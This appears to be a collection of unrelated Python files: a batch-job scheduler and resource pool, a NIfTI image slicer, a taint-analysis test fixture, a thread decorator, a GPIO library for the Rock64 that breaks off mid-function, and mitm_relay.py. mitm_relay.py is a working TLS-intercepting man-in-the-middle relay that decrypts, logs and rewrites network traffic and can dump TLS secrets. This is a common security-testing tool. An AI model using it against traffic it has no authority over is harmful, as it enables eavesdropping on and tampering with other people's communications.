log.debug("Issuing the command: %s with memory: %i, cores: %i, disk: %i" % (
jobDesc.command, jobDesc.memory, cores, jobDesc.disk))
with self.jobIndexLock:
jobID = self.jobIndex
self.jobIndex += 1
self.jobs[jobID] = jobDesc.command
if self.debugWorker:
# Run immediately, blocking for return.
# Ignore resource requirements; we run one job at a time
self._runDebugJob(jobDesc.command, jobID, self.environment.copy())
else:
# Queue the job for later
self.inputQueue.put((jobDesc.command, jobID, cores, jobDesc.memory,
jobDesc.disk, self.environment.copy()))
return jobID
def killBatchJobs(self, jobIDs):
"""Kills jobs by ID."""
self._checkOnDaddy()
log.debug('Killing jobs: {}'.format(jobIDs))
for jobID in jobIDs:
if jobID in self.runningJobs:
info = self.runningJobs[jobID]
info.killIntended = True
if info.popen != None:
log.debug('Send kill to PID %s', info.popen.pid)
info.popen.kill()
log.debug('Sent kill to PID %s', info.popen.pid)
else:
# No popen if running in forkless mode currently
assert self.debugWorker
log.critical("Can't kill job: %s in debug mode" % jobID)
while jobID in self.runningJobs:
pass
def getIssuedBatchJobIDs(self):
"""Just returns all the jobs that have been run, but not yet returned as updated."""
self._checkOnDaddy()
return list(self.jobs.keys())
def getRunningBatchJobIDs(self):
self._checkOnDaddy()
now = time.time()
return {jobID: now - info.time for jobID, info in list(self.runningJobs.items())}
def shutdown(self):
"""
Cleanly terminate and join daddy thread.
"""
if self.daddyThread is not None:
# Tell the daddy thread to stop.
self.shuttingDown.set()
# Wait for it to stop.
self.daddyThread.join()
BatchSystemSupport.workerCleanup(self.workerCleanupInfo)
def getUpdatedBatchJob(self, maxWait):
"""Returns a tuple of a no-longer-running job, the return value of its process, and its runtime, or None."""
self._checkOnDaddy()
try:
item = self.outputQueue.get(timeout=maxWait)
except Empty:
return None
self.jobs.pop(item.jobID)
log.debug("Ran jobID: %s with exit value: %i", item.jobID, item.exitStatus)
return item
@classmethod
def setOptions(cls, setOption):
setOption("scale", default=1)
class Info(object):
"""
Record for a running job.
Stores the start time of the job, the Popen object representing its child
(or None), the tuple of (coreFractions, memory, disk) it is using (or
None), and whether the job is supposed to be being killed.
"""
# Can't use namedtuple here since killIntended needs to be mutable
def __init__(self, startTime, popen, resources, killIntended):
self.time = startTime
self.popen = popen
self.resources = resources
self.killIntended = killIntended
class ResourcePool(object):
"""
Represents an integral amount of a resource (such as memory bytes).
Amounts can be acquired immediately or with a timeout, and released.
Provides a context manager to do something with an amount of resource
acquired.
"""
def __init__(self, initial_value, resourceType, timeout=5):
super(ResourcePool, self).__init__()
# We use this condition to signal everyone whenever some resource is released.
# We use its associated lock to guard value.
self.condition = Condition()
# This records how much resource is available right now.
self.value = initial_value
self.resourceType = resourceType
self.timeout = timeout
def acquireNow(self, amount):
"""
Reserve the given amount of the given resource.
Returns True if successful and False if this is not possible immediately.
"""
with self.condition:
if amount > self.value:
return False
self.value -= amount
self.__validate()
return True
def acquire(self, amount):
"""
Reserve the given amount of the given resource.
Raises AcquisitionTimeoutException if this is not possible in under
self.timeout time.
"""
with self.condition:
startTime = time.time()
while amount > self.value:
if time.time() - startTime >= self.timeout:
# This means the thread timed out waiting for the resource.
raise self.AcquisitionTimeoutException(resource=self.resourceType,
requested=amount, available=self.value)
# Allow self.timeout seconds to get the resource, else quit
# through the above if condition. This wait + timeout is the
# last thing in the loop such that a request that takes longer
# than self.timeout due to multiple wakes under the threshold
# are still honored.
self.condition.wait(timeout=self.timeout)
self.value -= amount
self.__validate()
def release(self, amount):
with self.condition:
self.value += amount
self.__validate()
self.condition.notify_all()
def __validate(self):
assert 0 <= self.value
def __str__(self):
return str(self.value)
def __repr__(self):
return "ResourcePool(%i)" % self.value
@contextmanager
def acquisitionOf(self, amount):
self.acquire(amount)
try:
yield
finally:
self.release(amount)
class AcquisitionTimeoutException(Exception):
"""To be raised when a resource request times out."""
def __init__(self, resource, requested, available):
"""
Creates an instance of this exception that indicates which resource is insufficient for
current demands, as well as the amount requested and amount actually available.
:param str resource: string representing the resource type
:param int|float requested: the amount of the particular resource requested that resulted
in this exception
:param int|float available: amount of the particular resource actually available
"""
self.requested = requested
self.available = available
self.resource = resource
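# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of Toil): ResourcePool hands out integral
# amounts of a resource and blocks, up to its timeout, until enough is free.
# The pool size and amounts below are illustrative only.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    memory_pool = ResourcePool(1024, 'memory', timeout=1)
    # Reserve 512 units for the duration of the with-block, then release them.
    with memory_pool.acquisitionOf(512):
        assert memory_pool.value == 512
    # acquireNow() never blocks; it just reports whether the reservation fit.
    assert memory_pool.acquireNow(2048) is False
    assert memory_pool.acquireNow(1024) is True
    memory_pool.release(1024)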
|
read_nii_files_parallel_processing.py
|
# This code loads the nii files (in parallel) and saves them in to types: 1- all 3 views in one figure; 2) all individual slices in specified folders.
# Written by Azam Hamidinekoo, Aberystwyth University, 2019
#-------------------------------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import nibabel as nib
import os
from multiprocessing import Process, Queue
import scipy
def show_slices(slices):
""" Function to display row of image slices """
fig, axes = plt.subplots(1, len(slices))
for i, slice in enumerate(slices):
axes[i].imshow(slice.T, cmap="gray", origin="lower")
axes[i].axis('off')
def saveAllViews(q, name, path):
example_filename = os.path.join(path, name)
img = nib.load(example_filename)
img_data = img.get_fdata()
print(' The shape of the 3D image is:')
print(img_data.shape)
#print(img.affine.shape)
#print(img.header)
# Save all views in one figure
a = np.array(img_data.shape)
for i in range(0, a.min()):
slice_00 = img_data[i, :, :]
slice_11 = img_data[:, i, :]
slice_22 = img_data[:, :, i]
slices_together = [slice_00, slice_11, slice_22]
show_slices(slices_together)
plt.suptitle(name)
# Save the figures with all views
folderName = '3Views_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderName):
os.mkdir(path+'/'+folderName)
plt.savefig(path+'/'+folderName+'/'+str(i)+'.png')
plt.close('all')
def main():
root = "/media/azh2/Seagate Backup Plus Drive/Azam/fMARI_data/Bangor/"
for path, subdirs, files in os.walk(root):
for name in files:
            print(os.path.join(path, name))
if name.find('nii.gz') != -1 and name.find('rest.nii.gz') == -1:
# save via parallel processing
q = Queue()
all_views = Process(target=saveAllViews, args=(q, name, path))
                all_views.start()
                # Load the volume in this process as well; the per-view slice loops below need img_data
                img_data = nib.load(os.path.join(path, name)).get_fdata()
                # Save the slices from different views
for i0 in range(0, img_data.shape[0]):
slice_0 = img_data[i0, :, :]
# save the slice0
folderSlices_0 = 'view0_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_0):
os.mkdir(path+'/'+folderSlices_0)
plt.imsave(path+'/'+folderSlices_0+'/'+str(i0)+'.png', slice_0, cmap='gray',
vmin=slice_0.min(), vmax=slice_0.max())
for i1 in range(0, img_data.shape[1]):
slice_1 = img_data[:, i1, :]
# save the slice1
folderSlices_1 = 'view1_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_1):
os.mkdir(path+'/'+folderSlices_1)
plt.imsave(path+'/'+folderSlices_1+'/'+str(i1)+'.png', slice_1, cmap='gray',
vmin=slice_1.min(), vmax=slice_1.max())
for i2 in range(0, img_data.shape[2]):
slice_2 = img_data[:, :, i2]
# save the slice2
folderSlices_2 = 'view2_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_2):
os.mkdir(path+'/'+folderSlices_2)
plt.imsave(path+'/'+folderSlices_2+'/'+str(i2)+'.png', slice_2, cmap='gray',
vmin=slice_2.min(), vmax=slice_2.max())
plt.show()
#plt.pause(.1)
if __name__ == '__main__':
main()
|
partial.py
|
# flake8: noqa
import multiprocessing
from builtins import __test_sink, __test_source
from functools import partial
def a_flows_to_sink(a, b):
__test_sink(a)
def partial_application_with_tainted():
x = __test_source()
partial(a_flows_to_sink, x)
def partial_application_with_benign():
x = 1
partial(a_flows_to_sink, x)
def partial_application_with_named_a():
x = __test_source()
partial(a_flows_to_sink, a=x)
def partial_application_with_named_b():
x = __test_source()
partial(a_flows_to_sink, b=x)
def multiprocessing_tainted():
multiprocessing.Process(target=a_flows_to_sink, args=(__test_source(), 1))
def multiprocessing_not_tainted():
multiprocessing.Process(target=a_flows_to_sink, args=(1, __test_source()))
|
decorators.py
|
# -*- coding: utf-8 -*-
# @Date : 2016-01-23 21:40
# @Author : leiyue (mr.leiyue@gmail.com)
# @Link : https://leiyue.wordpress.com/
def run_async(func):  # renamed from "async", which is a reserved keyword since Python 3.7
from threading import Thread
from functools import wraps
@wraps(func)
def wrapper(*args, **kwargs):
thr = Thread(target=func, args=args, kwargs=kwargs)
thr.start()
return thr
return wrapper
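
# A minimal usage sketch (illustration only, not part of the original module):
# decorating a function makes each call run in a background thread, and the
# returned Thread object can be join()ed if the caller needs to wait.
# The function and argument names below are hypothetical.
if __name__ == '__main__':
    import time

    @run_async
    def send_mail(recipient):
        time.sleep(0.1)  # stand-in for slow I/O
        print('mail sent to', recipient)

    t = send_mail('someone@example.com')
    t.join()  # optional: wait for the background work to finish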
|
mitm_relay.py
|
#!/usr/bin/env python3
import sys
import socket
import ssl
import os
import requests
import argparse
import time
import string
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from select import select
BIND_WEBSERVER = ('127.0.0.1', 49999)
BUFSIZE = 4096
__prog_name__ = 'mitm_relay'
__version__ = 1.0
def main():
parser = argparse.ArgumentParser(description='%s version %.2f' % (__prog_name__, __version__))
parser.add_argument('-l', '--listen',
action='store',
metavar='<listen>',
dest='listen',
help='Address the relays will listen on. Default: 0.0.0.0',
default='0.0.0.0')
parser.add_argument('-r', '--relay',
action='append',
nargs='+',
metavar='<relay>',
dest='relays',
help='''Create new relays.
                        Several relays can be created by repeating the parameter.
If the protocol is omitted, TCP will be assumed.
Format: [udp:|tcp:]lport:rhost:rport''',
required=True)
parser.add_argument('-s', '--script',
action='store',
metavar='<script>',
dest='script',
type=argparse.FileType('r'),
help='''Python script implementing the handle_request() and
handle_response() functions (see example). They will be
called before forwarding traffic to the proxy, if specified.''',
default=False)
parser.add_argument('-p', '--proxy',
action='store',
metavar='<proxy>',
dest='proxy',
help='''Proxy to forward all requests/responses to.
If omitted, traffic will only be printed to the console
(monitoring mode unless a script is specified).
Format: host:port''',
default=False)
parser.add_argument('-c', '--cert',
action='store',
metavar='<cert>',
dest='cert',
type=argparse.FileType('r'),
help='Certificate file to use for SSL/TLS interception',
default=False)
parser.add_argument('-k', '--key',
action='store',
metavar='<key>',
dest='key',
type=argparse.FileType('r'),
help='Private key file to use for SSL/TLS interception',
default=False)
parser.add_argument('-cc', '--clientcert',
action='store',
metavar='<clientcert>',
dest='clientcert',
type=argparse.FileType('r'),
help='Client certificate file to use for connecting to server',
default=False)
parser.add_argument('-ck', '--clientkey',
action='store',
metavar='<clientkey>',
dest='clientkey',
type=argparse.FileType('r'),
help='Client private key file to use for connecting to server',
default=False)
parser.add_argument('-t', '--tlsver',
action='store',
metavar='<tls1|tls11|tls12|ssl2|ssl3>',
dest='tlsver',
help='Force SSL/TLS version',
default=False)
parser.add_argument('-sk', '--sslkeylog',
action='store',
metavar='<ssl keylog file>',
dest='sslkeylog',
type=argparse.FileType('a'),
help='Dump SSL (pre-)master secrets to <ssl keylog file>',
default=False)
parser.add_argument('-ct', '--client-timeout',
action='store',
metavar=1.0,
dest='client_timeout',
type=int,
help='Client socket connection timeout',
default=False)
parser.add_argument('-st', '--server-timeout',
action='store',
metavar=1.0,
dest='server_timeout',
type=int,
help='Server socket connection timeout',
default=False)
cfg = parser.parse_args()
cfg.prog_name = __prog_name__
relays = [item for sublist in cfg.relays for item in sublist]
cfg.relays = []
for r in relays:
r = r.split(':')
try:
if len(r) == 3:
cfg.relays.append(('tcp', int(r[0]), r[1], int(r[2])))
elif len(r) == 4 and r[0] in ['tcp', 'udp']:
cfg.relays.append((r[0], int(r[1]), r[2], int(r[3])))
else:
raise
if r[0] == 'udp' and cfg.listen.startswith('127.0.0'):
print(color("[!] In UDP, it's not recommended to bind to 127.0.0.1. If you see errors, try to bind to your LAN IP address instead.", 1, 31))
except:
sys.exit('[!] error: Invalid relay specification, see help.')
if not (cfg.cert and cfg.key):
print(color("[!] Server cert/key not provided, SSL/TLS interception will not be available. To generate certs, see provided script 'gen_certs.sh'.", 1, 31))
if not (cfg.clientcert and cfg.clientkey):
print("[i] Client cert/key not provided.")
# There is no point starting the local web server
# if we are not going to intercept the req/resp (monitor only).
if cfg.proxy:
start_ws()
else:
print(color("[!] Interception disabled! %s will run in monitoring mode only." % __prog_name__, 0, 31))
# If a script was specified, import it
if cfg.script:
try:
from imp import load_source
cfg.script_module = load_source(cfg.script.name, cfg.script.name)
except Exception as e:
print(color("[!] %s" % str(e), 1, 31))
sys.exit()
# If a ssl keylog file was specified, dump (pre-)master secrets
if cfg.sslkeylog:
try:
import sslkeylog
sslkeylog.set_keylog(cfg.sslkeylog)
except Exception as e:
print(color("[!] %s" % str(e), 1, 31))
sys.exit()
server_threads = []
for relay in cfg.relays:
server_threads.append(Thread(target=create_server, args=(relay, cfg)))
for t in server_threads:
        t.daemon = True
t.start()
time.sleep(.2)
while True:
try:
time.sleep(100)
except KeyboardInterrupt:
sys.exit("\rExiting...")
class RequestHandler(BaseHTTPRequestHandler):
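    # This local webserver simply echoes back whatever request body it receives.
    # Its only purpose is to bounce the relayed TCP payloads through the HTTP
    # proxy given with --proxy, so they can be inspected and modified there.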
def do_GET(self):
content_length = int(self.headers.get('content-length'))
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
self.wfile.write(body)
return
def log_message(self, format, *args):
return
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
def start_ws():
print('[+] Webserver listening on', BIND_WEBSERVER)
server = HTTPServer(BIND_WEBSERVER, RequestHandler)
try:
t = Thread(target=server.serve_forever)
t.daemon = True
t.start()
except KeyboardInterrupt:
server.shutdown()
def color(txt, mod=1, fg=32, bg=49):
return "\033[%s;%d;%dm%s\033[0m" % (mod, fg, bg, txt) if 'win' not in sys.platform else txt
def data_repr(data):
def hexdump(src, length=16):
result = []
digits = 2
s = src[:]
for i in range(0, len(s), length):
hexa = " ".join(["%0*X" % (digits, x) for x in src[i:i+length]])
text = "".join([chr(x) if 0x20 <= x < 0x7F else "." for x in s[i:i+length]])
result.append("%08x: %-*s |%s|\n" % (i, length * (digits + 1), hexa, text))
return "".join(result)
try:
data = data.decode("ascii")
return '\n'+data
except:
return '\n'+hexdump(data)
# STARTTLS interception code based on:
# https://github.com/ipopov/starttls-mitm
def do_relay_tcp(client_sock, server_sock, cfg):
server_sock.settimeout(cfg.server_timeout)
client_sock.settimeout(cfg.client_timeout)
server_peer = server_sock.getpeername()
client_peer = client_sock.getpeername()
    # ssl.PROTOCOL_TLS only exists on newer Python versions (3.6+ / 2.7.13+),
    # so fall back to the equivalent PROTOCOL_SSLv23 alias if it is missing.
try:
cfg_ssl_version = ssl.PROTOCOL_TLS
except:
cfg_ssl_version = ssl.PROTOCOL_SSLv23
if cfg.tlsver:
if cfg.tlsver == "tls1":
cfg_ssl_version = ssl.PROTOCOL_TLSv1
elif cfg.tlsver == "tls11":
cfg_ssl_version = ssl.PROTOCOL_TLSv1_1
elif cfg.tlsver == "tls12":
cfg_ssl_version = ssl.PROTOCOL_TLSv1_2
elif cfg.tlsver in ["ssl2", "ssl3"]:
cfg_ssl_version = ssl.PROTOCOL_SSLv23
while True:
# Peek for the beginnings of an ssl handshake
try:
packet = client_sock.recv(BUFSIZE, socket.MSG_PEEK | socket.MSG_DONTWAIT)
if packet.startswith(b'\x16\x03'): # SSL/TLS Handshake.
if not (cfg.cert and cfg.key):
print(color("[!] SSL/TLS handshake detected, provide a server cert and key to enable interception.", 1, 31))
else:
print(color('---------------------- Wrapping sockets ----------------------', 1, 32))
client_sock = ssl.wrap_socket(client_sock, server_side=True, suppress_ragged_eofs=True, certfile=cfg.cert.name, keyfile=cfg.key.name, ssl_version=cfg_ssl_version)
# Use client-side cert/key if provided.
if (cfg.clientcert and cfg.clientkey):
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, certfile=cfg.clientcert.name, keyfile=cfg.clientkey.name, ssl_version=cfg_ssl_version)
else:
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, ssl_version=cfg_ssl_version)
except:
pass
receiving, _, _ = select([client_sock, server_sock], [], [])
try:
if client_sock in receiving:
data_out = client_sock.recv(BUFSIZE)
if not len(data_out): # client closed connection
print("[+] Client disconnected", client_peer)
client_sock.close()
server_sock.close()
break
data_out = proxify(data_out, cfg, client_peer, server_peer, to_server=True)
server_sock.send(data_out)
if server_sock in receiving:
data_in = server_sock.recv(BUFSIZE)
if not len(data_in): # server closed connection
print("[+] Server disconnected", server_peer)
client_sock.close()
server_sock.close()
break
data_in = proxify(data_in, cfg, client_peer, server_peer, to_server=False)
client_sock.send(data_in)
except socket.error as e:
print(color("[!] %s" % str(e), 1, 31))
def do_relay_udp(relay_sock, server, cfg):
client = None
while True:
receiving, _, _ = select([relay_sock], [], [])
if relay_sock in receiving:
data, addr = relay_sock.recvfrom(BUFSIZE)
if addr == server:
data = proxify(data, cfg, client, server, to_server=False)
relay_sock.sendto(data, client)
else:
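                # Any datagram not coming from the server is treated as the
                # current client; remember its address so server replies can
                # be relayed back to it.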
client = addr
data = proxify(data, cfg, client, server, to_server=True)
relay_sock.sendto(data, server)
def proxify(message, cfg, client_peer, server_peer, to_server=True):
def get_response():
try:
return requests.post('http://%s:%d/%s/%s/%d' %
(BIND_WEBSERVER[0], BIND_WEBSERVER[1],
('CLIENT_REQUEST/to' if to_server else 'SERVER_RESPONSE/from'),
server_peer[0], server_peer[1]),
proxies={'http': cfg.proxy},
headers=headers,
data=message).content
except requests.exceptions.ProxyError:
print(color("[!] error: can't connect to proxy!", 1, 31))
return message
"""
Modify traffic here
Send to our own parser functions, to the proxy, or both.
"""
server_str = color('%s:%d' % server_peer, 1, 34)
client_str = color('%s:%d' % client_peer, 1, 36)
date_str = color(time.strftime("%a %d %b %H:%M:%S", time.gmtime()), 1, 35)
modified_str = color('(modified!)', 1, 32)
modified = False
if cfg.script:
new_message = message
if to_server and hasattr(cfg.script_module, 'handle_request'):
new_message = cfg.script_module.handle_request(message)
if not to_server and hasattr(cfg.script_module, 'handle_response'):
new_message = cfg.script_module.handle_response(message)
if new_message == None:
print(color("[!] Error: make sure handle_request and handle_response both return a message.", 1, 31))
new_message = message
if new_message != message:
modified = True
message = new_message
if cfg.proxy:
headers = {u'User-Agent': None, u'Accept': None, u'Accept-Encoding': None, u'Connection': None}
headers['X-Mitm_Relay-To'] = '%s:%d' % (server_peer if to_server else client_peer)
headers['X-Mitm_Relay-From'] = '%s:%d' % (client_peer if to_server else server_peer)
new_message = get_response()
if new_message != message:
modified = True
message = new_message
if to_server:
msg_str = color(data_repr(message), 0, 93)
print("C >> S [ %s >> %s ] [ %s ] [ %d ] %s %s" % (client_str, server_str, date_str, len(message), modified_str if modified else '', msg_str))
else:
msg_str = color(data_repr(message), 0, 33)
print("S >> C [ %s >> %s ] [ %s ] [ %d ] %s %s" % (server_str, client_str, date_str, len(message), modified_str if modified else '', msg_str))
return message
def handle_tcp_client(client_sock, target, cfg):
try:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect(target)
do_relay_tcp(client_sock, server_sock, cfg)
except ConnectionRefusedError as e:
print(color('[!] Unable to connect to server: %s' % str(e), 1, 31))
def create_server(relay, cfg):
proto, lport, rhost, rport = relay
if proto == 'tcp':
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
serv.listen(2)
print('[+] Relay listening on %s %d -> %s:%d' % relay)
while True:
if proto == 'tcp':
client, addr = serv.accept()
dest_str = '%s:%d' % (relay[2], relay[3])
print(color('[+] New client %s:%d will be relayed to %s' % (addr[0], addr[1], dest_str), 1, 39))
thread = Thread(target=handle_tcp_client, args=(client, (rhost, rport), cfg))
thread.start()
else:
serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
thread = Thread(target=do_relay_udp, args=(serv, (rhost, rport), cfg))
thread.start()
if __name__=='__main__':
main()
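
# --- Hypothetical example plugin for the --script option (illustration only) ---
# Not part of mitm_relay itself: a file like this (the name relay_handlers.py is
# an assumption) would be saved separately and passed with `-s relay_handlers.py`.
# mitm_relay calls handle_request() on client->server data and handle_response()
# on server->client data; both must return the (possibly modified) bytes.
def handle_request(message):
    # Example tweak: rewrite a parameter before it reaches the server.
    return message.replace(b'user=guest', b'user=admin')

def handle_response(message):
    # Pass server responses through unchanged.
    return message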
|
_GPIO.py
|
#!/usr/bin/env python
# Allison Creely, 2018, LGPLv3 License
# Rock 64 GPIO Library for Python
# Import modules
import os.path
from multiprocessing import Process, Value
from time import time
from time import sleep
# Define static module variables
var_gpio_root = '/sys/class/gpio'
ROCK = 'ROCK'
BOARD = 'BOARD'
BCM = 'BCM'
HIGH = 1
LOW = 0
OUT = 'out'
IN = 'in'
RISING = 'rising'
FALLING = 'falling'
BOTH = 'both'
PUD_UP = 0
PUD_DOWN = 1
VERSION = '0.6.3'
RPI_INFO = {'P1_REVISION': 3, 'RAM': '1024M', 'REVISION': 'a22082', 'TYPE': 'Pi 3 Model B', 'PROCESSOR': 'BCM2837', 'MANUFACTURER': 'Embest'}
# Define GPIO arrays
ROCK_valid_channels = [27, 32, 33, 34, 35, 36, 37, 38, 60, 64, 65, 67, 68, 69, 76, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 100, 101, 102, 103, 104]
BOARD_to_ROCK = [0, 0, 0, 89, 0, 88, 0, 60, 64, 0, 65, 0, 67, 0, 0, 100, 101, 0, 102, 97, 0, 98, 103, 96, 104, 0, 76, 68, 69, 0, 0, 0, 38, 32, 0, 33, 37, 34, 36, 0, 35, 0, 0, 81, 82, 87, 83, 0, 0, 80, 79, 85, 84, 27, 86, 0, 0, 0, 0, 0, 0, 89, 88]
BCM_to_ROCK = [68, 69, 89, 88, 81, 87, 83, 76, 104, 98, 97, 96, 38, 32, 64, 65, 37, 80, 67, 33, 36, 35, 100, 101, 102, 103, 34, 82]
# Define dynamic module variables
gpio_mode = None
warningmode = 1
# GPIO Functions
def setmode(mode):
if mode in ['ROCK','BOARD','BCM']:
global gpio_mode
gpio_mode = mode
else:
print("An invalid mode ({}) was passed to setmode(). Use one of the following: ROCK, BOARD, BCM".format(mode))
def getmode():
if gpio_mode in ['ROCK','BOARD','BCM']:
return gpio_mode
else:
print("Error: An invalid mode ({}) is currently set".format(gpio_mode))
def get_gpio_number(channel):
if gpio_mode in ['ROCK','BOARD','BCM']:
# Convert to ROCK GPIO
if gpio_mode == BOARD:
channel_new = BOARD_to_ROCK[channel]
if gpio_mode == BCM:
channel_new = BCM_to_ROCK[channel]
if gpio_mode == ROCK:
channel_new = channel
# Check that the GPIO is valid
if channel_new in ROCK_valid_channels:
return channel_new
else:
print("Error: GPIO not supported on {0} {1}".format(gpio_mode, channel))
return None
else:
print("RuntimeError: Please set pin numbering mode using GPIO.setmode(GPIO.ROCK), GPIO.setmode(GPIO.BOARD), or GPIO.setmode(GPIO.BCM)")
return None
def gpio_function(channel):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
if channel_int == None:
return
# Get direction of requested GPIO
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'r') as file:
direction = file.read(1)
except:
return "GPIO.UNKNOWN"
if direction == 'i':
return "GPIO.INPUT"
elif direction == 'o':
return "GPIO.OUTPUT"
else:
return "GPIO.UNKNOWN"
def setwarnings(state=True):
if state in [0,1]:
global warningmode
warningmode = state
else:
print("Error: {} is not a valid warning mode. Use one of the following: True, 1, False, 0".format(state))
def validate_direction(channel, validation_type='both'):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
if channel_int == None:
return
# Get direction of requested GPIO
if validation_type in ['input', 'output', 'both']:
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'r') as file:
direction = file.read(1)
except:
direction = 'none'
# Perform sanity checks
if (validation_type == 'input') and (direction != 'i'):
print("You must setup() the GPIO channel ({0} {1}) as an input first".format(gpio_mode, channel))
return 0
elif (validation_type == 'output') and (direction != 'o'):
print("You must setup() the GPIO channel ({0} {1}) as an output first".format(gpio_mode, channel))
return 0
elif ((validation_type == 'both') and (direction not in ['i', 'o'])) or (direction == 'none'):
print("You must setup() the GPIO channel ({0} {1}) first".format(gpio_mode, channel))
return 0
else:
return 1
else:
print("Error: {} is not a valid direction. use one of the following: input, output, both")
return
def setup(channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
    # If channel is an integer, convert it to a list
    if isinstance(channel, int):
        channel = [channel]
    # Iterate through the channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
if channel_int == None:
return
# Check if GPIO export already exists
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
if warningmode == 1:
print("This channel ({0} {1}) is already in use, continuing anyway. Use GPIO.setwarnings(False) to disable warnings.".format(gpio_mode, channel[index]))
# Export GPIO if an export doesn't already exist
else:
try:
var_gpio_filepath = var_gpio_root + "/export"
with open(var_gpio_filepath, 'w') as file:
file.write(str(channel_int))
except:
print("Error: Unable to export GPIO")
# Set GPIO direction (in/out)
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'w') as file:
file.write(str(direction))
except:
print("Error: Unable to set GPIO direction")
return
# If GPIO direction is out, set initial value of the GPIO (high/low)
if direction == 'out':
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'w') as file:
                    # If multiple initial values were given, iterate through them
                    if not isinstance(initial, int):
file.write(str(initial[index]))
else:
file.write(str(initial))
except:
print("Error: Unable to set GPIO initial state")
# If GPIO direction is in, set the state of internal pullup (high/low)
if direction == 'in':
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/active_low"
with open(var_gpio_filepath, 'w') as file:
file.write(str(pull_up_down))
except:
print("Error: Unable to set internal pullup resistor state")
def output(channel, value):
    # If channel is an integer, convert it to a list
    if isinstance(channel, int):
        channel = [channel]
    # Iterate through the channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel[index], 'output') == 0:
return
# Set the value of the GPIO (high/low)
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'w') as file:
                # If multiple states were given, iterate through them
                if not isinstance(value, int):
file.write(str(value[index]))
else:
file.write(str(value))
except:
print("Error: Unable to set GPIO output state")
def input(channel):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'both') == 0:
return
# Get the value of the GPIO
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
return int(file.read(1))
except:
print("Error: Unable to get GPIO value")
def wait_for_edge(channel, edge, bouncetime='none', timeout='none'):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'input') == 0:
return
if edge not in [RISING, FALLING, BOTH]:
print("The edge must be set to GPIO.RISING, GPIO.FALLING or GPIO.BOTH")
return
if (bouncetime != 'none') and (bouncetime <= 0):
print("Bouncetime must be greater than 0")
return
if (timeout != 'none') and (timeout <= 0):
print("timeout must be greater than 0")
return
# Set the edge state to trigger on
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/edge"
with open(var_gpio_filepath, 'w') as file:
file.write(str(edge))
except:
print("Error: Unable to set GPIO edge state")
return
# Get current state of the input
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
original_value = file.read(1)
except:
print("Error: Unable to get GPIO value")
return
# convert times from ms to fractions of a second
if timeout != 'none':
timeout = timeout / 1000.0
if bouncetime != 'none':
bouncetime = bouncetime / 1000.0
# Wait for interrupt (10ms resolution)
while True:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
new_value = file.read(1)
if new_value != original_value:
if bouncetime != 'none':
sleep(bouncetime)
return True
sleep(0.01)
if timeout != 'none':
timeout -= 0.01
if timeout <= 0.0:
return None
def event_detected(channel):
print("Error: GPIO.event_detected() Not implemented")
def add_event_detect(gpio, edge, callback='none', bouncetime='none'):
print("Error: GPIO.add_event_detect() Not implemented")
#p = Process(target=wait_for_edge, args=(gpio, edge), name='eventdetect_process')
#p.start()
def add_event_callback(gpio, callback):
print("Error: GPIO.add_event_callback() Not implemented")
def remove_event_detect(gpio):
print("Error: GPIO.remove_event_detect() Not implemented")
def cleanup(channel='none'):
# If no channel is specified...
if channel == 'none':
# Cleanup all GPIOs
var_gpio_cleared = 0
for gpio_index in range(105):
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(gpio_index) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
try:
